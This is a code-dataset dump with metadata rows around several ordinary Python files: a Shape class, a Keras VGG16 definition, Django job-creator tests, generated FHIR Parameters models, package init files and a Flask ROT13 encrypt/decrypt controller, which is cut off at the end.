| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
df5c36424d5c237e241aa5572fe32834c5526434
| 148
|
py
|
Python
|
Section 13/shape.py
|
samlvlen/PacktPublishingz
|
1c71ffd71a649e876fc507a96ccd4597649218e5
|
[
"MIT"
] | 7
|
2019-10-15T08:24:58.000Z
|
2021-04-20T00:42:48.000Z
|
Section 13/shape.py
|
samlvlen/PacktPublishingz
|
1c71ffd71a649e876fc507a96ccd4597649218e5
|
[
"MIT"
] | null | null | null |
Section 13/shape.py
|
samlvlen/PacktPublishingz
|
1c71ffd71a649e876fc507a96ccd4597649218e5
|
[
"MIT"
] | 13
|
2019-11-17T13:22:58.000Z
|
2020-12-05T17:10:58.000Z
|
class Shape:
__color = None
def set_color(self, color):
self.__color = color
def get_color(self):
return self.__color
| 16.444444
| 31
| 0.614865
| 19
| 148
| 4.368421
| 0.473684
| 0.325301
| 0.337349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.304054
| 148
| 8
| 32
| 18.5
| 0.805825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
df8030c9c1aaea7b4ff1b25a2958948ba4189868
| 2,158
|
py
|
Python
|
examples/2.VGG16.py
|
hmeng22/NNNotes
|
444e6da2b7c962476714126be516727c2a75cb1f
|
[
"Apache-2.0"
] | null | null | null |
examples/2.VGG16.py
|
hmeng22/NNNotes
|
444e6da2b7c962476714126be516727c2a75cb1f
|
[
"Apache-2.0"
] | null | null | null |
examples/2.VGG16.py
|
hmeng22/NNNotes
|
444e6da2b7c962476714126be516727c2a75cb1f
|
[
"Apache-2.0"
] | null | null | null |
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout
from keras.layers.convolutional import Conv2D, MaxPooling2D
model = Sequential()
model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(224, 224, 3), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (3, 2), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu', kernel_initializer='uniform'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1000, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
model.summary()
| 67.4375
| 137
| 0.716867
| 311
| 2,158
| 4.909968
| 0.154341
| 0.125737
| 0.119188
| 0.212836
| 0.828422
| 0.823838
| 0.823838
| 0.823838
| 0.823838
| 0.804846
| 0
| 0.070682
| 0.069045
| 2,158
| 31
| 138
| 69.612903
| 0.689398
| 0
| 0
| 0.6
| 0
| 0
| 0.113531
| 0.011121
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
800387084af8fb0da6714f4e546c8dd82f0fca66
| 11,167
|
py
|
Python
|
src/jobs/tests/test_job_creator.py
|
Musacca/predict-python
|
97f2cc62d5891057cadd24b7905662be625dff9b
|
[
"MIT"
] | null | null | null |
src/jobs/tests/test_job_creator.py
|
Musacca/predict-python
|
97f2cc62d5891057cadd24b7905662be625dff9b
|
[
"MIT"
] | 1
|
2020-04-20T19:41:07.000Z
|
2020-04-20T19:41:07.000Z
|
src/jobs/tests/test_job_creator.py
|
Musacca/predict-python
|
97f2cc62d5891057cadd24b7905662be625dff9b
|
[
"MIT"
] | null | null | null |
from django.test.testcases import TestCase
from src.jobs.job_creator import generate, generate_labelling, update
from src.jobs.models import JobTypes
from src.jobs.tasks import prediction_task
from src.utils.django_orm import duplicate_orm_row
from src.utils.tests_utils import create_test_job
class TestJobCreator(TestCase):
def test_generate(self):
job = create_test_job()
initial_job = job.to_dict()
del initial_job['id']
del initial_job['created_date']
del initial_job['modified_date']
del initial_job['hyperparameter_optimizer']
del initial_job['encoding']['features']
del initial_job['labelling']['attribute_name']
generated_job = generate(split=job.split, payload={
'type': 'classification',
'split_id': 1,
'config': {
'clusterings': ['noCluster'],
'encodings': ['simpleIndex'],
'encoding': {
'padding': False,
'prefix_length': 1,
'generation_type': 'only',
'add_remaining_time': False,
'add_elapsed_time': False,
'add_executed_events': False,
'add_resources_used': False,
'add_new_traces': False,
'features': [],
},
'create_models': False,
'methods': ['randomForest'],
'kmeans': {},
'incremental_train': {
'base_model': None,
},
'hyperparameter_optimizer': {
'algorithm_type': 'tpe',
'max_evaluations': 10,
'performance_metric': 'rmse',
'type': 'none',
},
'labelling': {
'type': 'next_activity',
'attribute_name': '',
'threshold_type': 'threshold_mean',
'threshold': 0,
},
'classification.decisionTree': {},
'classification.knn': {},
'classification.randomForest': {},
'classification.adaptiveTree': {},
'classification.hoeffdingTree': {},
'classification.multinomialNB': {},
'classification.perceptron': {},
'classification.SGDClassifier': {},
'classification.xgboost': {},
'classification.nn': {},
'regression.lasso': {},
'regression.linear': {},
'regression.randomForest': {},
'regression.xgboost': {},
'regression.nn': {},
'time_series_prediction.rnn': {}
}
})[0].to_dict()
del generated_job['id']
del generated_job['created_date']
del generated_job['modified_date']
del generated_job['hyperparameter_optimizer']
del generated_job['encoding']['features']
del generated_job['labelling']['attribute_name']
self.assertDictEqual(initial_job, generated_job)
def test_generate_up_to(self):
job = create_test_job()
initial_job = job.to_dict()
del initial_job['id']
del initial_job['created_date']
del initial_job['modified_date']
del initial_job['hyperparameter_optimizer']
del initial_job['encoding']['features']
del initial_job['encoding']['task_generation_type']
del initial_job['labelling']['attribute_name']
generated_job = generate(split=job.split, payload={
'type': 'classification',
'split_id': 1,
'config': {
'clusterings': ['noCluster'],
'encodings': ['simpleIndex'],
'encoding': {
'padding': False,
'prefix_length': 2,
'generation_type': 'up_to',
'add_remaining_time': False,
'add_elapsed_time': False,
'add_executed_events': False,
'add_resources_used': False,
'add_new_traces': False,
'features': [],
},
'create_models': False,
'methods': ['randomForest'],
'kmeans': {},
'incremental_train': {
'base_model': None,
},
'hyperparameter_optimizer': {
'algorithm_type': 'tpe',
'max_evaluations': 10,
'performance_metric': 'rmse',
'type': 'none',
},
'labelling': {
'type': 'next_activity',
'attribute_name': '',
'threshold_type': 'threshold_mean',
'threshold': 0,
},
'classification.decisionTree': {},
'classification.knn': {},
'classification.randomForest': {},
'classification.adaptiveTree': {},
'classification.hoeffdingTree': {},
'classification.multinomialNB': {},
'classification.perceptron': {},
'classification.SGDClassifier': {},
'classification.xgboost': {},
'classification.nn': {},
'regression.lasso': {},
'regression.linear': {},
'regression.randomForest': {},
'regression.xgboost': {},
'regression.nn': {},
'time_series_prediction.rnn': {}
}
})[0].to_dict()
del generated_job['id']
del generated_job['created_date']
del generated_job['modified_date']
del generated_job['hyperparameter_optimizer']
del generated_job['encoding']['features']
del generated_job['encoding']['task_generation_type']
del generated_job['labelling']['attribute_name']
self.assertDictEqual(initial_job, generated_job)
def test_generate_labelling(self):
job = create_test_job()
job.type = JobTypes.LABELLING.value
job.save()
generated_job = generate_labelling(split=job.split, payload={
'type': 'labelling',
'split_id': 1,
'config': {
'encodings': ['simpleIndex'],
'encoding': {
'padding': False,
'prefix_length': 1,
'generation_type': 'only',
'add_remaining_time': False,
'add_elapsed_time': False,
'add_executed_events': False,
'add_resources_used': False,
'add_new_traces': False,
'features': [],
},
'create_models': False,
'labelling': {
'type': 'next_activity',
'attribute_name': '',
'threshold_type': 'threshold_mean',
'threshold': 0,
}
}
})[0]
self.assertEqual(job.type, generated_job.type)
self.assertEqual(job.split, generated_job.split)
job.encoding.features = None
generated_job.encoding.features = None
self.assertDictEqual(job.encoding.to_dict(), generated_job.encoding.to_dict())
job.labelling.attribute_name = None
generated_job.labelling.attribute_name = None
self.assertDictEqual(job.labelling.to_dict(), generated_job.labelling.to_dict())
def test_generate_labelling_up_to(self):
job = create_test_job()
job.type = JobTypes.LABELLING.value
job.save()
generated_job = generate_labelling(split=job.split, payload={
'type': 'labelling',
'split_id': 1,
'config': {
'encodings': ['simpleIndex'],
'encoding': {
'padding': False,
'prefix_length': 2,
'generation_type': 'up_to',
'add_remaining_time': False,
'add_elapsed_time': False,
'add_executed_events': False,
'add_resources_used': False,
'add_new_traces': False,
'features': [],
},
'create_models': False,
'labelling': {
'type': 'next_activity',
'attribute_name': '',
'threshold_type': 'threshold_mean',
'threshold': 0,
}
}
})[0]
self.assertEqual(job.type, generated_job.type)
self.assertEqual(job.split, generated_job.split)
job.encoding.features = None
job.encoding.task_generation_type = None
generated_job.encoding.features = None
generated_job.encoding.task_generation_type = None
self.assertDictEqual(job.encoding.to_dict(), generated_job.encoding.to_dict())
job.labelling.attribute_name = None
generated_job.labelling.attribute_name = None
self.assertDictEqual(job.labelling.to_dict(), generated_job.labelling.to_dict())
def test_update(self):
job = create_test_job()
prediction_task(job.id)
job2 = duplicate_orm_row(job)
job.refresh_from_db()
job2.incremental_train = job
job2.type = JobTypes.UPDATE.value
job2.save()
initial_job = job2#.to_dict()
generated_job = update(split=job.split, payload={
'type': 'classification',
'split_id': 1,
'config': {
'clusterings': ['noCluster'],
'encodings': ['simpleIndex'],
'encoding': {
'padding': False,
'prefix_length': 1,
'generation_type': 'only',
'add_remaining_time': False,
'add_elapsed_time': False,
'add_executed_events': False,
'add_resources_used': False,
'add_new_traces': False,
'features': [],
},
'create_models': False,
'methods': ['randomForest'],
'kmeans': {},
'incremental_train': [job.id],
'hyperparameter_optimizer': {
'algorithm_type': 'tpe',
'max_evaluations': 10,
'performance_metric': 'rmse',
'type': 'none',
},
'labelling': {
'type': 'next_activity',
'attribute_name': '',
'threshold_type': 'threshold_mean',
'threshold': 0,
}
}
})[0]#.to_dict()
#TODO: probably missing to_dict for incremental model
# self.assertEqual(initial_job, generated_job)
| 37.854237
| 88
| 0.492702
| 885
| 11,167
| 5.937853
| 0.132203
| 0.07764
| 0.03216
| 0.038059
| 0.892674
| 0.888868
| 0.866032
| 0.852521
| 0.852521
| 0.852521
| 0
| 0.004545
| 0.389182
| 11,167
| 294
| 89
| 37.982993
| 0.76587
| 0.010477
| 0
| 0.831461
| 1
| 0
| 0.271773
| 0.062466
| 0
| 0
| 0
| 0.003401
| 0.037453
| 1
| 0.018727
| false
| 0
| 0.022472
| 0
| 0.044944
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
801afd5321897c79553c21f4d202e3485214c17d
| 101
|
py
|
Python
|
common_utils/constants/__init__.py
|
cm107/common_utils
|
4b911efe9f8cdec16ecb2a983e16f772be05076c
|
[
"MIT"
] | null | null | null |
common_utils/constants/__init__.py
|
cm107/common_utils
|
4b911efe9f8cdec16ecb2a983e16f772be05076c
|
[
"MIT"
] | null | null | null |
common_utils/constants/__init__.py
|
cm107/common_utils
|
4b911efe9f8cdec16ecb2a983e16f772be05076c
|
[
"MIT"
] | null | null | null |
from .number_constants import *
from .extension_constants import *
from .color_constants import Color
| 33.666667
| 34
| 0.841584
| 13
| 101
| 6.307692
| 0.461538
| 0.54878
| 0.463415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108911
| 101
| 3
| 35
| 33.666667
| 0.911111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
80318966e9b9ab91419d3b68aabbf7f436d18a9f
| 13,441
|
py
|
Python
|
fhirclient/models/parameters.py
|
JamesSkane/smart_resources
|
85c362542b85ebc43ec00cd04915b114ee95f9c0
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/parameters.py
|
JamesSkane/smart_resources
|
85c362542b85ebc43ec00cd04915b114ee95f9c0
|
[
"Apache-2.0"
] | null | null | null |
fhirclient/models/parameters.py
|
JamesSkane/smart_resources
|
85c362542b85ebc43ec00cd04915b114ee95f9c0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 0.5.0.5149 (http://hl7.org/fhir/StructureDefinition/Parameters) on 2015-07-06.
# 2015, SMART Health IT.
from . import address
from . import attachment
from . import codeableconcept
from . import coding
from . import contactpoint
from . import fhirdate
from . import fhirelement
from . import fhirreference
from . import humanname
from . import identifier
from . import period
from . import quantity
from . import range
from . import ratio
from . import resource
from . import signature
from . import timing
class Parameters(resource.Resource):
""" Operation Request or Response.
This special resource type is used to represent
[operation](operations.html] request and response. It has no other use, and
there is no RESTful end=point associated with it.
"""
resource_name = "Parameters"
def __init__(self, jsondict=None):
""" Initialize all valid properties.
"""
self.parameter = None
""" Operation Parameter.
List of `ParametersParameter` items (represented as `dict` in JSON). """
super(Parameters, self).__init__(jsondict)
def elementProperties(self):
js = super(Parameters, self).elementProperties()
js.extend([
("parameter", "parameter", ParametersParameter, True),
])
return js
class ParametersParameter(fhirelement.FHIRElement):
""" Operation Parameter.
A parameter passed to or received from the operation.
"""
resource_name = "ParametersParameter"
def __init__(self, jsondict=None):
""" Initialize all valid properties.
"""
self.name = None
""" Name from the definition.
Type `str`. """
self.part = None
""" Named part of a parameter (e.g. Tuple).
List of `ParametersParameterPart` items (represented as `dict` in JSON). """
self.resource = None
""" If parameter is a whole resource.
Type `Resource` (represented as `dict` in JSON). """
self.valueAddress = None
""" If parameter is a data type.
Type `Address` (represented as `dict` in JSON). """
self.valueAttachment = None
""" If parameter is a data type.
Type `Attachment` (represented as `dict` in JSON). """
self.valueBase64Binary = None
""" If parameter is a data type.
Type `str`. """
self.valueBoolean = None
""" If parameter is a data type.
Type `bool`. """
self.valueCode = None
""" If parameter is a data type.
Type `str`. """
self.valueCodeableConcept = None
""" If parameter is a data type.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.valueCoding = None
""" If parameter is a data type.
Type `Coding` (represented as `dict` in JSON). """
self.valueContactPoint = None
""" If parameter is a data type.
Type `ContactPoint` (represented as `dict` in JSON). """
self.valueDate = None
""" If parameter is a data type.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueDateTime = None
""" If parameter is a data type.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueDecimal = None
""" If parameter is a data type.
Type `float`. """
self.valueHumanName = None
""" If parameter is a data type.
Type `HumanName` (represented as `dict` in JSON). """
self.valueIdentifier = None
""" If parameter is a data type.
Type `Identifier` (represented as `dict` in JSON). """
self.valueInstant = None
""" If parameter is a data type.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueInteger = None
""" If parameter is a data type.
Type `int`. """
self.valuePeriod = None
""" If parameter is a data type.
Type `Period` (represented as `dict` in JSON). """
self.valueQuantity = None
""" If parameter is a data type.
Type `Quantity` (represented as `dict` in JSON). """
self.valueRange = None
""" If parameter is a data type.
Type `Range` (represented as `dict` in JSON). """
self.valueRatio = None
""" If parameter is a data type.
Type `Ratio` (represented as `dict` in JSON). """
self.valueReference = None
""" If parameter is a data type.
Type `FHIRReference` (represented as `dict` in JSON). """
self.valueSignature = None
""" If parameter is a data type.
Type `Signature` (represented as `dict` in JSON). """
self.valueString = None
""" If parameter is a data type.
Type `str`. """
self.valueTime = None
""" If parameter is a data type.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueTiming = None
""" If parameter is a data type.
Type `Timing` (represented as `dict` in JSON). """
self.valueUri = None
""" If parameter is a data type.
Type `str`. """
super(ParametersParameter, self).__init__(jsondict)
def elementProperties(self):
js = super(ParametersParameter, self).elementProperties()
js.extend([
("name", "name", str, False),
("part", "part", ParametersParameterPart, True),
("resource", "resource", resource.Resource, False),
("valueAddress", "valueAddress", address.Address, False),
("valueAttachment", "valueAttachment", attachment.Attachment, False),
("valueBase64Binary", "valueBase64Binary", str, False),
("valueBoolean", "valueBoolean", bool, False),
("valueCode", "valueCode", str, False),
("valueCodeableConcept", "valueCodeableConcept", codeableconcept.CodeableConcept, False),
("valueCoding", "valueCoding", coding.Coding, False),
("valueContactPoint", "valueContactPoint", contactpoint.ContactPoint, False),
("valueDate", "valueDate", fhirdate.FHIRDate, False),
("valueDateTime", "valueDateTime", fhirdate.FHIRDate, False),
("valueDecimal", "valueDecimal", float, False),
("valueHumanName", "valueHumanName", humanname.HumanName, False),
("valueIdentifier", "valueIdentifier", identifier.Identifier, False),
("valueInstant", "valueInstant", fhirdate.FHIRDate, False),
("valueInteger", "valueInteger", int, False),
("valuePeriod", "valuePeriod", period.Period, False),
("valueQuantity", "valueQuantity", quantity.Quantity, False),
("valueRange", "valueRange", range.Range, False),
("valueRatio", "valueRatio", ratio.Ratio, False),
("valueReference", "valueReference", fhirreference.FHIRReference, False),
("valueSignature", "valueSignature", signature.Signature, False),
("valueString", "valueString", str, False),
("valueTime", "valueTime", fhirdate.FHIRDate, False),
("valueTiming", "valueTiming", timing.Timing, False),
("valueUri", "valueUri", str, False),
])
return js
class ParametersParameterPart(fhirelement.FHIRElement):
""" Named part of a parameter (e.g. Tuple).
A named part of a parameter. In many implementation context, a set of named
parts is known as a "Tuple".
"""
resource_name = "ParametersParameterPart"
def __init__(self, jsondict=None):
""" Initialize all valid properties.
"""
self.name = None
""" Name from the definition.
Type `str`. """
self.resource = None
""" If part is a whole resource.
Type `Resource` (represented as `dict` in JSON). """
self.valueAddress = None
""" Value of the part.
Type `Address` (represented as `dict` in JSON). """
self.valueAttachment = None
""" Value of the part.
Type `Attachment` (represented as `dict` in JSON). """
self.valueBase64Binary = None
""" Value of the part.
Type `str`. """
self.valueBoolean = None
""" Value of the part.
Type `bool`. """
self.valueCode = None
""" Value of the part.
Type `str`. """
self.valueCodeableConcept = None
""" Value of the part.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.valueCoding = None
""" Value of the part.
Type `Coding` (represented as `dict` in JSON). """
self.valueContactPoint = None
""" Value of the part.
Type `ContactPoint` (represented as `dict` in JSON). """
self.valueDate = None
""" Value of the part.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueDateTime = None
""" Value of the part.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueDecimal = None
""" Value of the part.
Type `float`. """
self.valueHumanName = None
""" Value of the part.
Type `HumanName` (represented as `dict` in JSON). """
self.valueIdentifier = None
""" Value of the part.
Type `Identifier` (represented as `dict` in JSON). """
self.valueInstant = None
""" Value of the part.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueInteger = None
""" Value of the part.
Type `int`. """
self.valuePeriod = None
""" Value of the part.
Type `Period` (represented as `dict` in JSON). """
self.valueQuantity = None
""" Value of the part.
Type `Quantity` (represented as `dict` in JSON). """
self.valueRange = None
""" Value of the part.
Type `Range` (represented as `dict` in JSON). """
self.valueRatio = None
""" Value of the part.
Type `Ratio` (represented as `dict` in JSON). """
self.valueReference = None
""" Value of the part.
Type `FHIRReference` (represented as `dict` in JSON). """
self.valueSignature = None
""" Value of the part.
Type `Signature` (represented as `dict` in JSON). """
self.valueString = None
""" Value of the part.
Type `str`. """
self.valueTime = None
""" Value of the part.
Type `FHIRDate` (represented as `str` in JSON). """
self.valueTiming = None
""" Value of the part.
Type `Timing` (represented as `dict` in JSON). """
self.valueUri = None
""" Value of the part.
Type `str`. """
super(ParametersParameterPart, self).__init__(jsondict)
def elementProperties(self):
js = super(ParametersParameterPart, self).elementProperties()
js.extend([
("name", "name", str, False),
("resource", "resource", resource.Resource, False),
("valueAddress", "valueAddress", address.Address, False),
("valueAttachment", "valueAttachment", attachment.Attachment, False),
("valueBase64Binary", "valueBase64Binary", str, False),
("valueBoolean", "valueBoolean", bool, False),
("valueCode", "valueCode", str, False),
("valueCodeableConcept", "valueCodeableConcept", codeableconcept.CodeableConcept, False),
("valueCoding", "valueCoding", coding.Coding, False),
("valueContactPoint", "valueContactPoint", contactpoint.ContactPoint, False),
("valueDate", "valueDate", fhirdate.FHIRDate, False),
("valueDateTime", "valueDateTime", fhirdate.FHIRDate, False),
("valueDecimal", "valueDecimal", float, False),
("valueHumanName", "valueHumanName", humanname.HumanName, False),
("valueIdentifier", "valueIdentifier", identifier.Identifier, False),
("valueInstant", "valueInstant", fhirdate.FHIRDate, False),
("valueInteger", "valueInteger", int, False),
("valuePeriod", "valuePeriod", period.Period, False),
("valueQuantity", "valueQuantity", quantity.Quantity, False),
("valueRange", "valueRange", range.Range, False),
("valueRatio", "valueRatio", ratio.Ratio, False),
("valueReference", "valueReference", fhirreference.FHIRReference, False),
("valueSignature", "valueSignature", signature.Signature, False),
("valueString", "valueString", str, False),
("valueTime", "valueTime", fhirdate.FHIRDate, False),
("valueTiming", "valueTiming", timing.Timing, False),
("valueUri", "valueUri", str, False),
])
return js
| 36.13172
| 101
| 0.564393
| 1,276
| 13,441
| 5.923981
| 0.112853
| 0.068792
| 0.051594
| 0.080434
| 0.829475
| 0.798518
| 0.755391
| 0.752613
| 0.651012
| 0.647176
| 0
| 0.003575
| 0.313221
| 13,441
| 371
| 102
| 36.229111
| 0.815296
| 0.053567
| 0
| 0.788462
| 1
| 0
| 0.167073
| 0.002805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.108974
| 0
| 0.205128
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
33e28dc1fc5108d7fd01c59c7d45edf2b1ceeca0
| 1,089
|
py
|
Python
|
nfv/nfv-common/nfv_common/alarm/__init__.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-common/nfv_common/alarm/__init__.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-common/nfv_common/alarm/__init__.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common.alarm.objects.v1 import ALARM_CONTEXT # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_EVENT_TYPE # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_PROBABLE_CAUSE # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_SEVERITY # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_TREND_INDICATION # noqa: F401
from nfv_common.alarm.objects.v1 import ALARM_TYPE # noqa: F401
from nfv_common.alarm.objects.v1 import AlarmData # noqa: F401
from nfv_common.alarm.objects.v1 import AlarmStateData # noqa: F401
from nfv_common.alarm.objects.v1 import AlarmThresholdData # noqa: F401
from nfv_common.alarm._alarm_module import alarm_clear # noqa: F401
from nfv_common.alarm._alarm_module import alarm_finalize # noqa: F401
from nfv_common.alarm._alarm_module import alarm_initialize # noqa: F401
from nfv_common.alarm._alarm_module import alarm_raise # noqa: F401
from nfv_common.alarm._alarm_module import alarm_subsystem_sane # noqa: F401
| 51.857143
| 77
| 0.809917
| 169
| 1,089
| 4.988166
| 0.242604
| 0.116251
| 0.215896
| 0.298932
| 0.758007
| 0.758007
| 0.758007
| 0.758007
| 0.71293
| 0.615658
| 0
| 0.06341
| 0.116621
| 1,089
| 20
| 78
| 54.45
| 0.81289
| 0.218549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
1d2a580f669c070c6fc8750356da7d72424c836a
| 4,494
|
py
|
Python
|
src/controllers/rot13_controller.py
|
Devwarlt/string-man-py
|
3d9d3255f5a11db95c137df6bcaf50b6bdff290c
|
[
"MIT"
] | null | null | null |
src/controllers/rot13_controller.py
|
Devwarlt/string-man-py
|
3d9d3255f5a11db95c137df6bcaf50b6bdff290c
|
[
"MIT"
] | null | null | null |
src/controllers/rot13_controller.py
|
Devwarlt/string-man-py
|
3d9d3255f5a11db95c137df6bcaf50b6bdff290c
|
[
"MIT"
] | null | null | null |
from werkzeug.datastructures import ImmutableMultiDict
from flask.wrappers import Request
from flask import jsonify
from repositories import rot13_repository
from traceback import format_exc
from json import loads
import logging
def encrypt(request: Request) -> str:
result: dict = {}
try:
if request.method == 'GET':
body: ImmutableMultiDict = request.args
plain_text: str = body.get('plain_text', type=str)
if not plain_text:
result.update({
'status': 400,
'response': "Missing argument 'plain_text' on request"
})
else:
rot13_encrypted_text: str = rot13_repository\
.Rot13.encrypt(plain_text)
result.update({
'status': 200,
'response': {
'plain_text': plain_text,
'rot13_encrypted_text': rot13_encrypted_text
}
})
if request.method == 'POST':
decoded_data: str = request.data.decode('utf-8')
if decoded_data.startswith("\'")\
and decoded_data.endswith("\'"):
decoded_data = decoded_data[1:-1]
body: dict = loads(decoded_data)
plain_text: str = body.get('plain_text')
if not plain_text:
result.update({
'status': 400,
'response': "Missing argument 'plain_text' on request"
})
else:
rot13_encrypted_text: str = rot13_repository\
.Rot13.encrypt(plain_text)
result.update({
'status': 200,
'response': {
'plain_text': plain_text,
'rot13_encrypted_text': rot13_encrypted_text
}
})
except Exception:
stacktrace: str = format_exc()
logging.getLogger(__name__).error(stacktrace)
result.update({
'status': 500,
'response': "Internal Server Error",
'stacktrace': stacktrace
})
result.update({'method': request.method})
return jsonify(result)
def decrypt(request: Request) -> str:
result: dict = {}
try:
if request.method == 'GET':
body: ImmutableMultiDict = request.args
rot13_encrypted_text: str = body.get(
'rot13_encrypted_text', type=str)
if not rot13_encrypted_text:
result.update({
'status': 400,
'response': "Missing argument 'rot13_encrypted_text' on request"
})
else:
plain_text: str = rot13_repository\
.Rot13.decrypt(rot13_encrypted_text)
result.update({
'status': 200,
'response': {
'plain_text': plain_text,
'rot13_encrypted_text': rot13_encrypted_text
}
})
if request.method == 'POST':
decoded_data: str = request.data.decode('utf-8')
if decoded_data.startswith("\'")\
and decoded_data.endswith("\'"):
decoded_data = decoded_data[1:-1]
body: dict = loads(decoded_data)
rot13_encrypted_text: str = body.get('rot13_encrypted_text')
if not rot13_encrypted_text:
result.update({
'status': 400,
'response': "Missing argument 'rot13_encrypted_text' on request"
})
else:
plain_text: str = rot13_repository\
.Rot13.decrypt(rot13_encrypted_text)
result.update({
'status': 200,
'response': {
'plain_text': plain_text,
'rot13_encrypted_text': rot13_encrypted_text
}
})
except Exception:
